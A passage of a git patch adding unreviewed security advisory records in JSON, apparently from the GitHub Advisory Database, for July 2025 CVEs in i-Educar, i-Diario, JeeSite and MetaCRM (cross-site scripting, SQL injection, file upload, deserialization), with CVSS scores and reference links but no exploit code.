"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7869" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README19.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316982" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316982" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.605663" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T05:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9vwg-x83c-449p/GHSA-9vwg-x83c-449p.json b/advisories/unreviewed/2025/07/GHSA-9vwg-x83c-449p/GHSA-9vwg-x83c-449p.json new file mode 100644 index 0000000000000..d395926b53e1f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9vwg-x83c-449p/GHSA-9vwg-x83c-449p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9vwg-x83c-449p", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7867" + ], + "details": "A vulnerability classified as problematic has been found in Portabilis i-Educar 2.9.0. Affected is an unknown function of the file /intranet/agenda.php of the component Agenda Module. The manipulation of the argument novo_titulo leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7867" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README17.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316980" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316980" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.605633" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T05:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cv3p-whpp-jcwr/GHSA-cv3p-whpp-jcwr.json b/advisories/unreviewed/2025/07/GHSA-cv3p-whpp-jcwr/GHSA-cv3p-whpp-jcwr.json new file mode 100644 index 0000000000000..c5f1fca78e729 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cv3p-whpp-jcwr/GHSA-cv3p-whpp-jcwr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cv3p-whpp-jcwr", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7866" + ], + "details": "A vulnerability was found in Portabilis i-Educar 2.9.0. It has been rated as problematic. This issue affects some unknown processing of the file /intranet/educar_deficiencia_lst.php of the component Disabilities Module. The manipulation of the argument Deficiência ou Transtorno leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7866" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README16.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316979" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316979" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.605618" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T04:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g822-656r-fggc/GHSA-g822-656r-fggc.json b/advisories/unreviewed/2025/07/GHSA-g822-656r-fggc/GHSA-g822-656r-fggc.json new file mode 100644 index 0000000000000..8d2b5e75f442b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g822-656r-fggc/GHSA-g822-656r-fggc.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g822-656r-fggc", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7865" + ], + "details": "A vulnerability was found in thinkgem JeeSite up to 5.12.0. It has been declared as problematic. This vulnerability affects the function xssFilter of the file src/main/java/com/jeesite/common/codec/EncodeUtils.java of the component XSS Filter. The manipulation of the argument text leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 3585737d21fe490ff6948d913fcbd8d99c41fc08. It is recommended to apply a patch to fix this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7865" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/32" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/issues/32#issuecomment-3051177029" + }, + { + "type": "WEB", + "url": "https://github.com/thinkgem/jeesite5/commit/3585737d21fe490ff6948d913fcbd8d99c41fc08" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316978" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316978" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618190" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T04:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mmc6-r5xm-56vx/GHSA-mmc6-r5xm-56vx.json b/advisories/unreviewed/2025/07/GHSA-mmc6-r5xm-56vx/GHSA-mmc6-r5xm-56vx.json new file mode 100644 index 0000000000000..187fa9ce92cd6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mmc6-r5xm-56vx/GHSA-mmc6-r5xm-56vx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmc6-r5xm-56vx", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7870" + ], + "details": "A vulnerability, which was classified as problematic, was found in Portabilis i-Diario 1.5.0. This affects an unknown part of the component justificativas-de-falta Endpoint. The manipulation of the argument Anexo leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7870" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7870.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316983" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316983" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.607947" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T06:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vc79-r43j-mc27/GHSA-vc79-r43j-mc27.json b/advisories/unreviewed/2025/07/GHSA-vc79-r43j-mc27/GHSA-vc79-r43j-mc27.json new file mode 100644 index 0000000000000..efdef7e9fb48e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vc79-r43j-mc27/GHSA-vc79-r43j-mc27.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vc79-r43j-mc27", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7871" + ], + "details": "A vulnerability has been found in Portabilis i-Diario 1.5.0 and classified as problematic. This vulnerability affects unknown code of the file /conteudos. The manipulation of the argument filter[by_description] leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7871" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316984" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316984" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.607948" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T06:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vhxp-qr7j-q4qj/GHSA-vhxp-qr7j-q4qj.json b/advisories/unreviewed/2025/07/GHSA-vhxp-qr7j-q4qj/GHSA-vhxp-qr7j-q4qj.json new file mode 100644 index 0000000000000..314e34f3ad93c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vhxp-qr7j-q4qj/GHSA-vhxp-qr7j-q4qj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhxp-qr7j-q4qj", + "modified": "2025-07-20T06:31:16Z", + "published": "2025-07-20T06:31:16Z", + "aliases": [ + "CVE-2025-7868" + ], + "details": "A vulnerability classified as problematic was found in Portabilis i-Educar 2.9.0. Affected by this vulnerability is an unknown functionality of the file /intranet/educar_calendario_dia_motivo_cad.php of the component Calendar Module. The manipulation of the argument Motivo leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7868" + }, + { + "type": "WEB", + "url": "https://github.com/RaulPazemecxas/PoCVulDb/blob/main/README18.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316981" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316981" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.605655" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T05:15:41Z" + } +} \ No newline at end of file From 05011585588a48a15f0c58e11c7fab9578ba2069 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 09:34:18 +0000 Subject: [PATCH 034/323] Publish Advisories GHSA-52ph-6458-wrfv GHSA-6m22-2qrr-5mrj GHSA-fc33-jx4w-chw2 GHSA-ghfc-35gq-cj3p GHSA-mvrh-wm9j-9q35 GHSA-v634-7vfp-h7g5 GHSA-vgwq-9g63-j555 GHSA-vrj5-2cpp-xrhh --- .../GHSA-52ph-6458-wrfv.json | 52 +++++++++++++++++++ .../GHSA-6m22-2qrr-5mrj.json | 52 +++++++++++++++++++ .../GHSA-fc33-jx4w-chw2.json | 52 +++++++++++++++++++ .../GHSA-ghfc-35gq-cj3p.json | 52 +++++++++++++++++++ .../GHSA-mvrh-wm9j-9q35.json | 52 +++++++++++++++++++ .../GHSA-v634-7vfp-h7g5.json | 52 +++++++++++++++++++ .../GHSA-vgwq-9g63-j555.json | 48 +++++++++++++++++ .../GHSA-vrj5-2cpp-xrhh.json | 52 +++++++++++++++++++ 8 files changed, 412 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-52ph-6458-wrfv/GHSA-52ph-6458-wrfv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6m22-2qrr-5mrj/GHSA-6m22-2qrr-5mrj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fc33-jx4w-chw2/GHSA-fc33-jx4w-chw2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ghfc-35gq-cj3p/GHSA-ghfc-35gq-cj3p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mvrh-wm9j-9q35/GHSA-mvrh-wm9j-9q35.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v634-7vfp-h7g5/GHSA-v634-7vfp-h7g5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vgwq-9g63-j555/GHSA-vgwq-9g63-j555.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vrj5-2cpp-xrhh/GHSA-vrj5-2cpp-xrhh.json diff --git a/advisories/unreviewed/2025/07/GHSA-52ph-6458-wrfv/GHSA-52ph-6458-wrfv.json b/advisories/unreviewed/2025/07/GHSA-52ph-6458-wrfv/GHSA-52ph-6458-wrfv.json new file mode 100644 index 0000000000000..8b344ddcb1bf5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-52ph-6458-wrfv/GHSA-52ph-6458-wrfv.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52ph-6458-wrfv", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7873" + ], + "details": "A vulnerability was found in Metasoft 美特软件 MetaCRM up to 6.4.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file mcc_login.jsp. The manipulation of the argument workerid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7873" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-SQLI-1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316987" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316987" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T07:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6m22-2qrr-5mrj/GHSA-6m22-2qrr-5mrj.json b/advisories/unreviewed/2025/07/GHSA-6m22-2qrr-5mrj/GHSA-6m22-2qrr-5mrj.json new file mode 100644 index 0000000000000..c87e58db71fc2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6m22-2qrr-5mrj/GHSA-6m22-2qrr-5mrj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m22-2qrr-5mrj", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7874" + ], + "details": "A vulnerability was found in Metasoft 美特软件 MetaCRM up to 6.4.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /env.jsp. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7874" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-SIL-2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316988" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316988" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611045" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T07:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fc33-jx4w-chw2/GHSA-fc33-jx4w-chw2.json b/advisories/unreviewed/2025/07/GHSA-fc33-jx4w-chw2/GHSA-fc33-jx4w-chw2.json new file mode 100644 index 0000000000000..1e200f1b75e5b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fc33-jx4w-chw2/GHSA-fc33-jx4w-chw2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc33-jx4w-chw2", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7877" + ], + "details": "A vulnerability, which was classified as critical, has been found in Metasoft 美特软件 MetaCRM up to 6.4.2. This issue affects some unknown processing of the file sendfile.jsp. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7877" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-Upload-4.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316991" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316991" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ghfc-35gq-cj3p/GHSA-ghfc-35gq-cj3p.json b/advisories/unreviewed/2025/07/GHSA-ghfc-35gq-cj3p/GHSA-ghfc-35gq-cj3p.json new file mode 100644 index 0000000000000..5f8026de59b01 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ghfc-35gq-cj3p/GHSA-ghfc-35gq-cj3p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghfc-35gq-cj3p", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7876" + ], + "details": "A vulnerability classified as critical was found in Metasoft 美特软件 MetaCRM up to 6.4.2. This vulnerability affects the function AnalyzeParam of the file download.jsp. The manipulation of the argument p leads to deserialization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7876" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM6-RCE-3.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316990" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316990" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611048" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T08:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mvrh-wm9j-9q35/GHSA-mvrh-wm9j-9q35.json b/advisories/unreviewed/2025/07/GHSA-mvrh-wm9j-9q35/GHSA-mvrh-wm9j-9q35.json new file mode 100644 index 0000000000000..7ae9adee1ed80 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mvrh-wm9j-9q35/GHSA-mvrh-wm9j-9q35.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvrh-wm9j-9q35", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7879" + ], + "details": "A vulnerability has been found in Metasoft 美特软件 MetaCRM up to 6.4.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file mobileupload.jsp. The manipulation of the argument File leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7879" + }, + { + "type": "WEB", + "url": "https://github.com/FightingLzn9/vul/blob/main/MetaCRM-Upload-6.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316993" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316993" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.611288" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T09:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v634-7vfp-h7g5/GHSA-v634-7vfp-h7g5.json b/advisories/unreviewed/2025/07/GHSA-v634-7vfp-h7g5/GHSA-v634-7vfp-h7g5.json new file mode 100644 index 0000000000000..9ab0de4bfcf8f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v634-7vfp-h7g5/GHSA-v634-7vfp-h7g5.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v634-7vfp-h7g5", + "modified": "2025-07-20T09:32:40Z", + "published": "2025-07-20T09:32:40Z", + "aliases": [ + "CVE-2025-7872" + ], + "details": "A vulnerability was found in Portabilis i-Diario 1.5.0 and classified as problematic. This issue affects some unknown processing of the file /justificativas-de-falta. The manipulation of the argument Justificativa leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7872" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVEs/blob/main/Report%201.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316985" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316985" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.610138" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T07:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vgwq-9g63-j555/GHSA-vgwq-9g63-j555.json b/advisories/unreviewed/2025/07/GHSA-vgwq-9g63-j555/GHSA-vgwq-9g63-j555.json new file mode 100644 index 0000000000000..6f0c62be821c0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vgwq-9g63-j555/GHSA-vgwq-9g63-j555.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgwq-9g63-j555", + "modified": "2025-07-20T09:32:40Z", + "published": 